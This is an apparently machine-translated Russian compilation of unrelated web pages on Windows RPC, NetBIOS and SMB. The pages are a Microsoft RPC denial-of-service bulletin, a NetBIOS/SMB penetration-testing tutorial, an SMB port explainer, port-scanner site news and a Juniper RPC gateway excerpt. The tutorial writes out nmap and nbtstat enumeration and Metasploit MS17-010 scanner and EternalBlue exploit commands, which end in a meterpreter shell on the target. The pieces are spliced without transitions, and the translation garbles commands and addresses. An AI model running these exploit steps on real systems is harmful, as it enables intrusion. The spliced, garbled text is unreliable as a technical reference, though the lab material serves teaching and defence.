Эта уязвимость допускает только атаку типа «отказ в обслуживании» и не дает злоумышленнику возможности изменять или получать данные на удаленном компьютере.
Уровень серьезности :
Windows NT 4.0 Важно
Windows NT 4.0, Terminal Server Edition Важно
Окна 2000 Важно
Windows XP Важно
Приведенная выше оценка основана на типах систем, подверженных уязвимости, их типичных схемах развертывания и влиянии на них эксплуатации уязвимости.
Идентификатор уязвимости: CAN-2002-1561
Протестированные версии:
Microsoft протестировала Windows NT 4.0, Windows 2000 и Windows XP, чтобы оценить, подвержены ли они этим уязвимостям. Предыдущие версии больше не поддерживаются и могут быть затронуты или не подвержены этим уязвимостям.
Часто задаваемые вопросы
Если Windows NT 4.0 указана как уязвимый продукт, почему Microsoft не выпускает исправление для нее?
Во время разработки Windows 2000 в архитектуру, лежащую в основе RPC, были внесены значительные улучшения.В некоторых областях эти изменения включали фундаментальные изменения в способе создания программного обеспечения RPC-сервера. Архитектура Windows NT 4.0 намного менее надежна, чем более поздняя архитектура Windows 2000. Из-за этих фундаментальных различий между Windows NT 4.0 и Windows 2000 и их преемниками невозможно перестроить программное обеспечение для Windows NT 4.0, чтобы устранить уязвимость. Для этого потребуется изменить архитектуру очень значительной части операционной системы Windows NT 4.0, а не только затронутого компонента RPC.Результат такой перестройки архитектуры будет в достаточной степени несовместим с Windows NT 4.0, так что не будет никакой гарантии, что приложения, разработанные для работы в Windows NT 4.0, будут продолжать работать в исправленной системе. Microsoft настоятельно рекомендует клиентам, все еще использующим Windows NT 4.0, защищать эти системы, размещая их за брандмауэром, который фильтрует трафик через порт 135. Такой брандмауэр будет блокировать атаки, пытающиеся использовать эту уязвимость, как описано в разделе обходных путей ниже.
Выпустит ли Microsoft в будущем исправление для Windows NT 4.0?
Корпорация Майкрософт тщательно изучила инженерное решение для NT 4.0 и обнаружила, что архитектура Windows NT 4.0 не поддерживает решение этой проблемы ни сейчас, ни в будущем.
Каков объем этой уязвимости?
Это уязвимость отказа в обслуживании. Злоумышленник, успешно воспользовавшийся этой уязвимостью, может вызвать сбой удаленного компьютера.Однако злоумышленник не мог изменить или получить данные или выполнить код по своему выбору на удаленном компьютере. Для проведения такой атаки злоумышленнику потребуется возможность установить TCP / IP-соединение с Endpoint Mapper, работающим на целевой машине. После установления TCP-соединения злоумышленник может отправить искаженное сообщение в службу RPC и тем самым вызвать сбой целевой машины. Лучшая защита от удаленных RPC-атак из Интернета — настроить брандмауэр на блокировку порта 135.RPC через TCP не предназначен для использования во враждебных средах, таких как Интернет
.
Что вызывает уязвимость?
Уязвимость возникает из-за того, что средство сопоставления конечных точек Windows RPC не проверяет должным образом вводимые сообщения при определенных обстоятельствах. Если злоумышленник отправит некорректное сообщение RPC определенного типа после того, как RPC установит соединение, это может привести к сбою процесса сопоставления конечных точек RPC на удаленном компьютере. Этот процесс отвечает за поддержание информации о подключении всех процессов на этой машине, использующих RPC.Поскольку средство сопоставления конечных точек работает в самой службе RPC, использование этой уязвимости приведет к сбою самой службы RPC с сопутствующей потерей всех служб на основе RPC, предлагаемых сервером, а также с потенциальной потерей некоторых функций COM.
Что такое RPC (удаленный вызов процедур)?
Удаленный вызов процедур (RPC) — это протокол, который программа может использовать для запроса услуги у программы, расположенной на другом компьютере в сети. RPC помогает в обеспечении взаимодействия, поскольку программе, использующей RPC, не обязательно понимать сетевые протоколы, поддерживающие связь.В RPC запрашивающая программа — это клиент, а программа, предоставляющая услуги, — это сервер.
Что такое сопоставитель конечных точек RPC?
Устройство сопоставления конечных точек RPC позволяет клиентам RPC определять номер порта, назначенный в настоящее время конкретной службе RPC. Конечная точка — это порт протокола или именованный канал, на котором серверное приложение прослушивает вызовы удаленных клиентских процедур. Клиент-серверные приложения могут использовать как хорошо известные, так и динамические порты.
Что не так с реализацией удаленного вызова процедур (RPC) Microsoft?
В той части RPC, которая имеет дело с обменом сообщениями через TCP / IP, имеется недостаток.Сбой возникает из-за неправильной обработки некорректных сообщений. Этот конкретный сбой влияет на процесс сопоставления конечных точек RPC, который прослушивает порт 135 TCP / IP. Сопоставитель конечных точек RPC позволяет клиентам RPC определять номер порта, назначенный в настоящее время конкретной службе RPC. Отправив искаженное сообщение RPC, злоумышленник может дать сбой службе RPC на компьютере.
Что могла сделать эта уязвимость злоумышленником?
Эта уязвимость может позволить злоумышленнику, который может отправлять сообщения RPC в процесс сопоставления конечных точек RPC на сервере, запустить атаку отказа в обслуживании.Даже если злоумышленник может вызвать сбой компьютеров, изменить или получить данные или выполнить код будет невозможно.
Как злоумышленник мог воспользоваться этой уязвимостью?
Злоумышленник может попытаться использовать эту уязвимость, запрограммировав компьютер, который может связываться с уязвимым сервером через TCP-порт 135, для отправки определенного вида искаженного сообщения RPC. Получение такого сообщения может привести к сбою службы RPC на уязвимой машине.
Что делает патч?
Патч устраняет уязвимость, правильно проверяя формат сообщений, получаемых через TCP / IP.Эта проверка позволяет сопоставителю конечных точек RPC отклонять искаженные сообщения.
Обходные пути
Я не могу сразу установить исправление для этой уязвимости. Могу ли я что-нибудь сделать, чтобы защитить себя от попыток использовать эту уязвимость?
Microsoft рекомендует следующие обходные пути:
BlockPort 135 на вашем брандмауэре. Порт 135 используется для инициирования RPC-соединения со службой RPC Endpoint Mapper.Блокирование порта 135 на брандмауэре предотвратит атаку систем, находящихся за этим брандмауэром, попытками использовать эту уязвимость. Однако, чтобы гарантировать, что эти системы не могут быть атакованы системами, находящимися за брандмауэром, вам все же следует рассмотреть возможность применения патча.
Межсетевой экран подключения к Интернету. Если вы используете брандмауэр подключения к Интернету в Windows XP для защиты подключения к Интернету, он по умолчанию блокирует входящий трафик RPC.
Доступность исправлений
Расположение для загрузки этого патча
Microsoft Windows 2000
Windows XP
Дополнительная информация об этом патче
Установочные площадки:
Включение в будущие пакеты обновления:
Исправление этой проблемы будет включено в пакет обновления 4 для Windows 2000 и пакет обновления 2 для Windows XP
Требуется перезагрузка: Да
Патч можно удалить: да
Замененные патчи: Нет.
Проверка установки исправления:
Windows 2000:
Чтобы убедиться, что исправление установлено на компьютере, убедитесь, что на компьютере создан следующий раздел реестра: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Updates \ Windows 2000 \ SP4 \ Q331953
Для проверки отдельных файлов используйте дату / время и информацию о версии, указанную в следующем разделе реестра: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Updates \ Windows 2000 \ SP4 \ Q331953 \ Filelist.
Windows XP:
При установке в Windows XP Gold:
Чтобы убедиться, что исправление установлено, убедитесь, что на компьютере создан следующий раздел реестра: HKLM \ Software \ Microsoft \ Updates \ Windows XP \ SP1 \ Q331953.
Для проверки отдельных файлов используйте дату / время и информацию о версии, указанную в следующем разделе реестра: HKLM \ Software \ Microsoft \ Updates \ Windows XP \ SP1 \ Q331953 \ Filelist.
При установке в Windows XP с пакетом обновления 1:
Чтобы убедиться, что исправление установлено, убедитесь, что на компьютере создан следующий раздел реестра: HKLM \ Software \ Microsoft \ Updates \ Windows XP \ SP2 \ Q331953.
Для проверки отдельных файлов используйте дату / время и информацию о версии, указанную в следующем разделе реестра: HKLM \ Software \ Microsoft \ Updates \ Windows XP \ SP2 \ Q331953 \ Filelist.
Предостережения:
Microsoft протестировала Windows NT 4.0 и Windows NT 4.0 Terminal Server Edition. Эти платформы уязвимы для атак типа «отказ в обслуживании», однако из-за архитектурных ограничений невозможно восстановить программное обеспечение для Windows NT 4.0 для устранения уязвимости.
Сообщалось, что применение этого исправления безопасности в некоторых конкретных конфигурациях приводит к тому, что локальные вызовы COM перестают отвечать. Эта проблема возникает только тогда, когда несколько локальных вызовов RPC выполняются быстро из нескольких потоков, и каждый поток имеет уникальный набор учетных данных безопасности. Поддерживаемое исправление теперь доступно от Microsoft. Дополнительные сведения об этом и сведения о получении исправления см. В статье 814119.
базы знаний Майкрософт.
Локализация:
Локализованные версии этого исправления доступны в местах, указанных в разделе «Доступность исправлений».
Получение других исправлений безопасности:
Исправления для других проблем безопасности доступны по следующим адресам:
Исправления безопасности доступны в Центре загрузки Microsoft, и их проще всего найти, выполнив поиск по ключевым словам «security_patch».
Патчи для потребительских платформ доступны на веб-сайте WindowsUpdate
Другая информация:
Благодарности
Microsoft благодарит Юсси Яаконахо за то, что он сообщил нам об этой проблеме и работал с нами для защиты клиентов.
Поддержка:
Ресурсы по безопасности: Веб-сайт безопасности Microsoft TechNet предоставляет дополнительную информацию о безопасности продуктов Microsoft.
Заявление об отказе от ответственности:
Информация, содержащаяся в базе знаний Microsoft, предоставляется «как есть» без каких-либо гарантий. Microsoft отказывается от всех гарантий, явных или подразумеваемых, включая гарантии товарной пригодности и пригодности для определенной цели.Ни при каких обстоятельствах корпорация Microsoft или ее поставщики не несут ответственности за любые убытки, включая прямые, косвенные, случайные, косвенные, упущенную выгоду или особые убытки, даже если корпорация Microsoft или ее поставщики были уведомлены о возможности таких убытков. В некоторых штатах не допускается исключение или ограничение ответственности за косвенный или случайный ущерб, поэтому вышеизложенное ограничение может не применяться.
Редакции:
V1.0 (26 марта 2003 г.): Бюллетень создан.
V1.1 (13 мая 2003 г.): в бюллетень добавлена информация и ссылка на статью 814119 базы знаний Майкрософт для клиентов, у которых возникли технические проблемы после установки этого исправления.
Год постройки 2014-04-18T13: 49: 36Z-07: 00
Тестирование на проникновение NetBIOS и SMB в Windows
Из Википедии
NetBIOS (сетевая базовая система ввода / вывода)
NetBIOS — это служба, которая обеспечивает связь между приложениями, такими как принтер или другой компьютер в сети Ethernet или Token Ring, через имя NetBIOS.
Имя NetBIOS — это 16-значный длинный символ, назначаемый WINS компьютеру в рабочей группе для преобразования имени IP-адреса в имя NETBIOS.
Рабочая группа VS Домен
Рабочая группа: Это одноранговая сеть для максимум 10 компьютеров в одной локальной сети или подсети. У него нет централизованного администрирования, что означает, что ни один компьютер не может контролировать другой компьютер. Каждый пользователь контролирует ресурсы и безопасность локально в своей системе.
Домен: Это сеть клиент / сервер, включающая до 2000 компьютеров в любой точке мира.Администратор управляет доменом, его пользователями и ресурсами. Пользователь с учетной записью в домене может войти в любую компьютерную систему, не имея учетной записи на этом компьютере.
NetBIOS предоставляет три различных сервиса:
Служба имен (NetBIOS-NS) для регистрации и разрешения имен через порт 137 .
Служба распространения дейтаграмм (NetBIOS-DGM) для связи без подключения через порт 138 .
Сессионная служба (NetBIOS-SSN) для связи с установлением соединения через порт 139 .
Порт Протокол Сервис
135 TCP Устройство сопоставления конечных точек MS-RPC
137 UDP Служба имен NetBIOS
138 UDP Служба дейтаграмм NetBIOS
139 TCP Служба сеансов NetBIOS
445 TCP Протокол SMB
Порт 135: он используется для Microsoft R emote P rocedure C все между клиентом и сервером для прослушивания запроса клиента.В основном он используется для связи между клиент-клиентом и клиент-сервером для отправки сообщений.
Порт 137 : служба имен работает на UDP-порту 137. Примитивы службы имен, предлагаемые NetBIOS:
Добавить имя — регистрирует имя NetBIOS.
Добавить имя группы — регистрирует имя «группы» NetBIOS.
Удалить имя — отмена регистрации имени NetBIOS или имени группы.
Найти имя — поиск имени NetBIOS в сети.
Порт 138 : режим дейтаграммы не требует установления соединения; приложение отвечает за обнаружение ошибок и исправление. В NBT служба дейтаграмм работает через порт UDP 138. NetBIOS предлагает следующие примитивы службы дейтаграмм:
Отправить дейтаграмму — отправить дейтаграмму на удаленное имя NetBIOS.
Отправить широковещательную дейтаграмму — отправить дейтаграмму всем именам NetBIOS в сети.
Получить дейтаграмму — дождаться прибытия пакета в результате операции отправки дейтаграммы.
Прием широковещательной дейтаграммы — дождитесь прибытия пакета в результате операции отправки широковещательной дейтаграммы.
Порт 139 : режим сеанса позволяет двум компьютерам устанавливать соединение, позволяет сообщениям охватывать несколько пакетов и обеспечивает обнаружение ошибок и восстановление. В NBT служба сеанса работает на TCP-порту 139.
Примитивы службы сеанса, предлагаемые NetBIOS:
Вызов — открывает сеанс с удаленным именем NetBIOS.
Слушать — прослушивать попытки открыть сеанс с именем NetBIOS.
Hang Up — завершить сеанс.
Отправить — отправляет пакет компьютеру на другом конце сеанса.
Send No Ack — аналогично отправке, но не требует подтверждения.
Прием — дождитесь прибытия пакета от отправки на другом конце сеанса.
Порт 445: Он используется для протокола SMB (блок сообщений сервера) для обмена файлами между различными операционными системами, то есть windows-windows, Unix-Unix и Unix-windows.
Подробнее о почте читайте в нашей предыдущей статье, приведенной ниже: —
Сканирование открытого порта для перечисления NETBIOS
Мы используем nmap для сканирования целевой сети на предмет открытых TCP- и UDP-портов и протоколов.
нмп -sT -sU 192.168.1.128
Из данного изображения видно, что в результате сканирования мы обнаружили порт 137 — это открытый для служб имен NetBIOS, кроме того, получили MAC-адрес целевой системы.
Что произойдет, если администратор предоставит общий доступ к папке в сети?
Предположим, мы дали разрешение на общий доступ к определенной папке (например, ignite , как показано на данном изображении), чтобы мы могли поделиться этой папкой с другим пользователем в локальной сети, а затем какой порт будет задействован в этом процессе.
Теперь вы можете заметить, что у нас есть ссылка на нашу общую папку. Используя эту ссылку, любой может получить доступ к этой папке в этой сети, следовательно, это означает, что теперь необходимо активировать новый порт для установления соединения, чтобы получить доступ к общей папке в другой системе, позвольте выяснить это.
Теперь снова воспользуемся помощью nmap для повторного сканирования цели.
нмп -sT -sU 192.168.1.128
По результатам сканирования вы можете заметить, что после совместного использования папки мы обнаружили порт 135 , 139 и 445 и активировали .
Следовательно, только при совместном использовании одной папки в сети три порта одновременно открываются в целевой системе для связи с другой системой.
Через компьютер> свойства пользователь может просматривать основную информацию о своем компьютере.
Как вы понимаете, мы делимся изображением домашней панели управления жертвы, которая показывает основную информацию о его системе, такую как имя компьютера, рабочая группа и т. Д.
Эту же информацию можно перечислить в другой системе в этой сети с помощью следующей команды:
nbtstat -a 192.168.1.128
Следовательно, вы можете прочитать информацию из таблицы имен удаленных компьютеров NetBIOS, в которой мы перечислили ту же информацию, что и на изображении выше.
Применить фильтр к порту 135-139 с брандмауэром
Для повышения безопасности вашей системы в локальной сети вы можете добавить фильтр на порт 137 с помощью оконного брандмауэра. Поскольку серия портов от 135 до 139 наиболее уязвима, , поэтому администратор может заблокировать либо целую серию, либо конкретный порт.
Выберите Правила для входящих подключений и щелкните Новое правило.
Установите переключатель для порта , который создаст новое правило, контролирующее соединения для порта TCP или UDP.
Затем нажмите , затем нажмите .
Выберите порт UDP, чтобы применить к нему правило.
Измените порт 137 как конкретный локальный порт, затем нажмите «Далее». Здесь вы также можете добавить полные серии, например, 135,137,138,139.
Выберите Заблокировать соединение. — это действие, выполняемое, когда соединение соответствует указанному условию.
Следовательно, он не разрешит трафик на порт 137 для связи, в результате, если злоумышленник просканирует систему-жертву, он не сможет найти NetBIOS-имя целевой системы.
Щелкните рядом с .
Наконец, укажите заголовок к новому правилу по вашему выбору (как показано на изображении block nbtstat ), а затем нажмите Finish , и вы увидите, что новый фильтр / правило будет добавлен в брандмауэр Windows.
Теперь просканируйте целевую систему с помощью предыдущей команды
nbtstat -a 192.168.1.128
На этот раз он не предоставит никакой информации, связанной с NetBIOS. С помощью данного изображения вы можете прочитать сообщение «Хост не найден.
Вывод: Следовательно, заблокировав 137, администратор добавил уровень безопасности, который будет скрывать NetBIOS-имя своей системы (192.168.1.128) в локальной сети.
Доступ к общей папке через порт 139
Теперь давайте попробуем получить доступ к общей папке целевого объекта (192.168.1.128) с помощью командной строки запуска.Из данного изображения вы можете увидеть, что мы можем получить доступ к папке ignite. Это возможно благодаря сервису «NetBIOS session service», работающему на порту 139.
Блочный порт 139
Аналогичным образом снова используйте правило входящего брандмауэра, чтобы заблокировать порт 139 , чтобы мы могли проверить его влияние на обмен информацией между двумя или более системами. Это добавит новый элемент в брандмауэр, чтобы остановить трафик, поступающий на порт 139.
Теперь снова попробуем получить доступ к общей папке целевого объекта (192.168.1.128), когда порт 139 заблокирован им, и выяснить, можем ли мы получить доступ к общей папке «ignite» или нет, используя командную строку запуска.
Из данного изображения вы можете видеть, что мы можем получить доступ к папке ignite, когда порт 139 был заблокирован администратором в его сети.
Заключение: Хотя порт 139 был заблокирован, но все же совместное использование было возможно из-за работающего протокола на порте 445. Следовательно, заблокировав порты 137 и 139, администратор добавил уровень безопасности, который предотвратит службу сеансов NetBIOS, а также службу имен NetBIOS для Перечисление NetBIOS.
В основном во многих организациях серии портов от 135 до 139 заблокированы в сети по соображениям безопасности, поэтому порт 445 используется для обмена данными в сети. Теперь определите, уязвим ли он для MS17-010, используя Metasploit, как показано на данном изображении.
использовать вспомогательный / сканер / smb / smb_ms17_010 вспомогательный msf (smb_ms17_010)> установить rhosts 192.168.1.128 вспомогательный msf (smb_ms17_010)> установить rport 445 Вспомогательный msf (smb_ms17_010)> эксплойт
В результате мы обнаружили, что хост уязвим для MS17-010, поэтому мы можем легко использовать цель.
Подробнее о методах сканирования читайте в нашей предыдущей статье от здесь .
используйте эксплойт / windows / smb / ms17_010_eternalblue эксплойт msf (ms17_010_eternalblue)> установить rhost 192.168.1.1.128 эксплойт msf (ms17_010_eternalblue)> установить rport 445 эксплойт msf (ms17_010_eternalblue)> установить lhost 192.168.1.115 эксплойт msf (ms17_010_eternalblue)> эксплойт
Это задействует целевую систему и даст сеанс meterpreter целевой системы, как показано на данном изображении.
Заключение: Перечисление играет важную роль в тестировании на проникновение в сеть, поскольку оно позволяет извлечь скрытую информацию о системе жертвы, а также выявить слабые места, которые могут помочь в использовании системы.
Автор : Аарти Сингх — исследователь и технический писатель в Hacking Articles. Консультант по информационной безопасности, любитель социальных сетей и гаджетов. Свяжитесь с здесь
Что такое порт SMB? Описание портов 445 и 139
Протокол блока сообщений сервера (протокол SMB) — это протокол связи клиент-сервер, используемый для совместного доступа к файлам, принтерам, последовательным портам и данным в сети.Он также может нести протоколы транзакций для аутентифицированного межпроцессного взаимодействия.
Короче говоря, протокол SMB — это способ общения компьютеров друг с другом.
Как работает протокол SMB?
SMB работает по принципу клиент-сервер, когда клиент делает определенные запросы, а сервер отвечает соответствующим образом. Это известно как протокол ответа-запроса.
После подключения он позволяет пользователям или приложениям делать запросы к файловому серверу и получать доступ к таким ресурсам, как общий доступ к принтеру, почтовые ящики и именованные каналы на удаленном сервере.Это означает, что пользователь приложения может открывать, читать, перемещать, создавать и обновлять файлы на удаленном сервере.
SMB был первоначально разработан Барри Фейгенбаумом в IBM в 1983 году с целью превратить доступ к локальным файлам DOS INT 21h в сетевую файловую систему и изначально был разработан для работы поверх NetBIOS через TCP / IP (NBT) с использованием IP-порта 139. и UDP-порты 137 и 138. Программные приложения, работающие в сети NetBIOS, обнаруживают и идентифицируют друг друга по своим именам NetBIOS.
Microsoft объединила протокол SMB со своим продуктом LAN Manager, который она начала разрабатывать в 1990 году, и продолжает добавлять функции к протоколу в Windows для рабочих групп.
В 1996 году Microsoft выступила с инициативой переименовать SMB в Common Internet File System (CIFS) и добавила дополнительные функции, включая поддержку символических ссылок, жестких ссылок, файлов большего размера и первоначальную попытку поддержки прямых подключений через TCP-порт 445. без использования NetBIOS в качестве транспорта (в значительной степени экспериментальная работа, потребовавшая дальнейшей доработки).
В Microsoft Windows 2000 Microsoft изменила SMB для работы через порт 445. SMB по-прежнему использует порт 445.
Это оказалось проблематичным, поскольку CIFS был общеизвестным болтливым протоколом, который мог испортить производительность сети из-за задержек и многочисленных подтверждений.По оценкам Microsoft, SMB / CIFS скомпрометировал менее 10% сетевого трафика в средней корпоративной сети, но это по-прежнему значительный объем трафика.
Microsoft объяснила, что проблемы с производительностью в первую очередь связаны с тем, что SMB 1.0 является блочным, а не потоковым протоколом, который был разработан для небольших локальных сетей.
Следующий диалект, SMB 2.0, повысил эффективность протокола, сократив количество сотен команд и подкоманд до 19.
Microsoft продолжает инвестировать в повышение производительности и безопасности SMB.SMB 3.0, представленный в Windows 8 и Windows Server 2012, привнес несколько значительных изменений, которые добавили функциональность и улучшили производительность SMB2, особенно в виртуализированных центрах обработки данных.
Кроме того, он представил несколько улучшений безопасности, таких как сквозное шифрование и новый алгоритм подписи на основе AES.
Что такое диалекты протокола SMB?
Протокол SMB был создан в 1980-х годах компанией IBM и породил множество диалектов, разработанных для удовлетворения меняющихся требований к сети.Например, упомянутая выше Common Internet File System (CIFS) представляет собой конкретную реализацию SMB, которая обеспечивает совместное использование файлов.
Важные реализации SMB включают:
SMB 1.0 (1984)
‍ Создано IBM для совместного использования файлов в DOS. Он представил гибкую блокировку как механизм кэширования на стороне клиента, предназначенный для уменьшения сетевого трафика.
Samba (1992)
‍ Samba — это реализация с открытым исходным кодом протокола SMB и Microsoft Active Directory для систем Unix и дистрибутивов Linux, которая поддерживает совместное использование файлов и службы печати, аутентификацию и авторизацию, разрешение имен и объявления служб между серверами Linux / Unix и клиентами Windows.
CIFS (1996)
‍ Диалект SMB, разработанный корпорацией Майкрософт, который дебютировал в Windows 95 и добавил поддержку файлов большего размера, передачи напрямую через TCP / IP, символических и жестких ссылок.
NQ (1998)
‍ NQ — это семейство портативных реализаций SMB-клиента и сервера, разработанное Visuality Systems. NQ переносится на платформы, отличные от Windows, такие как Linux, iOS и Android, и поддерживает диалект SMB 3.1.1.
Netsmb (2004)
‍ Netsmb — это семейство встроенных в ядро клиентских и серверных реализаций SMB в операционных системах BSD.
SMB 2.0 (2006)
‍ Выпущенный с Windows Vista и Windows Server 2008, он уменьшил количество разговоров для повышения производительности, повышения масштабируемости и отказоустойчивости, а также добавил поддержку ускорения WAN.
Tuxera SMB (2009)
‍ Tuxera также является частной реализацией SMB, которая работает либо в ядре, либо в пользовательском пространстве.
Likewise (2009)
‍ Likewise разработала реализацию CIFS / SMB, которая предоставила многопротокольную платформу с поддержкой идентификации для сетевого доступа к файлам в OEM-продуктах хранения данных, созданных на платформах на базе Linux / Unix.
SMB 2.1 (2010)
‍ Введено в Windows Server 2008 R2 и Windows 7. Модель аренды оппортунистической блокировки клиента заменила гибкую блокировку для улучшения кэширования и повышения производительности. Он также представил поддержку больших максимальных единиц передачи (MTU) и улучшенную энергоэффективность, позволяя клиентам открывать файлы с сервера SMB для перехода в спящий режим.
SMB 3.0 (2012)
‍ Дебютировал в Windows 8 и Windows Server 2012. Он внес несколько значительных улучшений в доступность, производительность, резервное копирование, безопасность и управление.
MoSMB (2012)
‍ MoSMB — это проприетарная реализация SMB для Linux и других Unix-подобных систем, разработанная Ryussi Technologies. Он поддерживает только SMB 2.x и SMB 3.x. ‍
SMB 3.02 (2014)
‍ Представлен в Windows 8.1 и Windows Server 2012 R2 и включает обновления производительности и возможность отключения поддержки CIFS / SMB 1.0, включая удаление связанных двоичных файлов.
SMB 3.1.1 (2015)
‍ Выпущено с Windows 10 и Windows Server 2016 и добавлена поддержка расширенного шифрования, целостности предварительной проверки подлинности для предотвращения атак типа «злоумышленник в середине» и ограничения диалекта кластера.
Что такое порты 139 и 445?
SMB — это сетевой протокол обмена файлами, который требует открытого порта на компьютере или сервере для связи с другими системами. Порты SMB обычно имеют номера портов 139 и 445.
Порт 139 используется диалектами SMB, которые обмениваются данными через NetBIOS. Это протокол транспортного уровня, предназначенный для использования в операционных системах Windows по сети.
Порт 445 используется более новыми версиями SMB (после Windows 2000) поверх стека TCP, что позволяет SMB обмениваться данными через Интернет.Это также означает, что вы можете использовать IP-адреса для использования SMB, например для обмена файлами.
Опасны ли открытые порты?
Хотя порты 139 и 445 по своей сути не опасны, существуют известные проблемы с открытием этих портов для доступа в Интернет. Вы можете проверить, открыт ли порт, используя команду netstat.
Существует распространенное заблуждение, что открытый порт опасен. Это во многом обусловлено отсутствием понимания того, как работают открытые порты, почему они открыты, а какие не должны открываться.
Открытые порты необходимы для связи через Интернет. Однако открытый порт может стать опасным, если служба, прослушивающая порт, неправильно настроена, не исправлена, уязвима для эксплойтов или имеет плохие правила сетевой безопасности.
Самыми опасными открытыми портами являются порты, которые могут быть заражены червем, например, тот, который использует протокол SMB, который в некоторых операционных системах открыт по умолчанию.
Ранние версии протокола SMB использовались во время атаки вымогателя WannaCry с помощью эксплойта нулевого дня под названием EternalBlue.
WannaCry использовала устаревшие версии компьютеров Windows, которые использовали устаревшую версию протокола SMB. WannaCry — сетевой червь с транспортным механизмом, предназначенным для автоматического распространения. Транспортный код сканирует системы, уязвимые для эксплойта EternalBlue, а затем устанавливает DoublePulsar, инструмент бэкдора, и выполняет свою копию.
Зараженный компьютер будет искать в своей сети Windows устройства, принимающие трафик на TCP-портах 135–139 или 445, что указывает на то, что система настроена для работы с протоколом SMB.
Затем он инициирует соединение SMBv1 с устройством и использует переполнение буфера, чтобы взять под контроль систему и установить компонент атаки вымогателя.
Это означает, что WannaCry может распространяться автоматически без участия жертвы.
Хорошая новость заключается в том, что с тех пор Windows выпустила обновление безопасности для Windows XP, Windows Server 2003, Windows 8, Windows Vista, Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2008 R2, Windows Server 2012. и Windows Server 2016, чтобы предотвратить эту уязвимость.
Как обеспечить безопасность портов 139 и 445
Вот еще несколько способов защиты портов 139 и 445.
Избегайте раскрытия портов SMB
‍ Порты 135–139 и 445 небезопасно открывать публично и имеют не было уже десять лет.
Исправить все
‍ Держите свои системы в актуальном состоянии, чтобы избежать использования известных уязвимостей.
Нет единой точки отказа
‍ Будь то программа-вымогатель, вредоносное ПО, аппаратный сбой, ошибка базы данных или что-то еще.Если ваши данные важны, их следует создать резервную копию, по крайней мере, в одном другом безопасном месте. ‍
Используйте брандмауэр или защиту конечных точек
‍ Большинство решений включают черный список IP-адресов известных злоумышленников.
Используйте виртуальную частную сеть (VPN)
‍ VPN шифруют и защищают сетевой трафик.
Реализация виртуальных локальных сетей (VLAN)
‍ VLAN могут использоваться для изоляции внутреннего сетевого трафика
Использовать фильтрацию MAC-адресов
‍ Это может предотвратить доступ неизвестных систем к вашей сети.
UpGuard может защитить ваши открытые порты
UpGuard может защитить ваш бизнес от утечки данных, выявить все утечки данных и помочь вам постоянно контролировать состояние безопасности всех ваших поставщиков.
UpGuard также поддерживает соответствие множеству структур безопасности, включая новые требования, установленные Указом Байдена по кибербезопасности.
Проверьте безопасность своего веб-сайта, НАЖМИТЕ ЗДЕСЬ , чтобы получить мгновенную оценку безопасности прямо сейчас!
Библиотека поиска портов TCP и UDP, поиск портов TCP UDP
Инструменты для анонса ping порта [Новости 2009-10-26]
Мы обнаружили, что инструментальный пинг на некоторый настраиваемый порт на сервере может быть полезен, потому что это показывает время принятия соединения, которое связано со статистикой загрузки сервера.Обычный пинг проходит нормально во всех случаях, когда сетевая карта жива, а когда сервер зависает — пинг продолжает работать. В этом случае пинг будет продолжаться только в том случае, если программное обеспечение работает.
Выпущен
Scan hosts и инструмент диапазона IP-адресов! [Новости 2009-10-12]
Итак, это «Сканер портов диапазона IP» в левом меню. Этот инструмент создан для проверки одного номера порта, но на всем диапазоне ip (не на одном сервере). Он был протестирован на Firefox 3, FireFox 3.5, InternetExplorer 7, Opera 9, но результат может быть не совсем верным, в ходе тестов было обнаружено, что он верен не менее чем на 88%.
Выпущен сканер портов
! [Новости 2009-10-04]
Инструмент выпущен, он вызывает в левом меню «Проверить все открытые порты». Он был протестирован в Firefox 3, FireFox 3.5, InternetExplorer 7, Opera 9 и работает хорошо, но не работает в Koncueror brwoser. Качество сканирования, связанное с браузером пользователя и настройками интернет-провайдера, во время тестирования было обнаружено, что инструмент показывает больше портов как «открытых», но нет другого способа проверить порт из браузера.
Анонс сканера портов
[Новости 2009-09-28]
У нас уже есть инструмент, который можно использовать для сканирования ограниченного количества портов (сканирование идет с нашего сервера).Как мы узнаем, как разрешить нашим пользователям сканировать неограниченное количество (до 49000) портов сервера за один запрос — это будет очень полезно для исследования проблем безопасности собственного сервера, или просто найдите, какие порты остаются открытыми во время какой-либо внешней (сетевой) или внутренней (связанной с сервером) проблемы.
На этой странице вы можете найти инструменты для поиска с номерами портов TCP и с номерами портов UDP .
Текущая служба содержит самый большой tcp udp список портов . Общее количество записей составляет около 22000 (в 3 раза больше, чем в другом сервисе).
Библиотеки:
Библиотека назначения номеров портов IANA (база данных) — Управление по присвоению номеров в Интернете (IANA) отвечает за поддержание официальных назначений номеров портов для конкретных целей.
Библиотека назначения номеров портов WIKI (база данных) — Хорошо известная библиотека портов Википедии
Библиотека
Gasmy, Beta Library — хорошо известные вручную созданные базы данных портов.
Диапазон портов:
Известные порты от 0 до 1023.
Зарегистрированные порты с 1024 по 49151.
Динамические и / или частные порты — это порты с 49152 по 65535.

RPC ALG | Руководство пользователя шлюзов прикладного уровня
Вызов удаленных процедур Microsoft (MS-RPC) — это Реализация Microsoft распределенной вычислительной среды (DCE) RPC. Как и Sun RPC, MS-RPC позволяет запускать программы. на одном хосте для вызова процедур в программе, запущенной на другом хосте. Из-за большого количества RPC-сервисов и необходимости трансляции, транспортный адрес службы RPC согласовывается динамически на основе универсального уникального идентификатора сервисной программы (UUID).Конкретный UUID отображается на транспортный адрес.
Устройства с ОС Junos под управлением ОС Junos поддерживают MS-RPC как предопределенная услуга и разрешать и запрещать трафик на основе политики вы настраиваете. Шлюз уровня приложения (ALG) обеспечивает функциональность для устройств Juniper Networks для обработки динамического транспортного адреса механизм согласования MS-RPC, и для обеспечения безопасности на основе UUID соблюдение политики. Вы можете определить политику безопасности, чтобы разрешить или отклонить все запросы RPC или разрешить или запретить по определенному номеру UUID.ALG также поддерживает режим маршрутизации и трансляцию сетевых адресов (NAT). режим для входящих и исходящих запросов.
Когда и клиент MS-RPC, и сервер MS-RPC 64-разрядная версия (например, MS Exchange 2008), они договариваются об использовании NDR64 синтаксис передачи во время сетевого взаимодействия. когда вы используете NDR64, параметры интерфейса должны быть закодированы в соответствии с синтаксисом NDR64, потому что формат пакета для NDR64 отличается от формата пакета для NDR20 (32-разрядная версия).
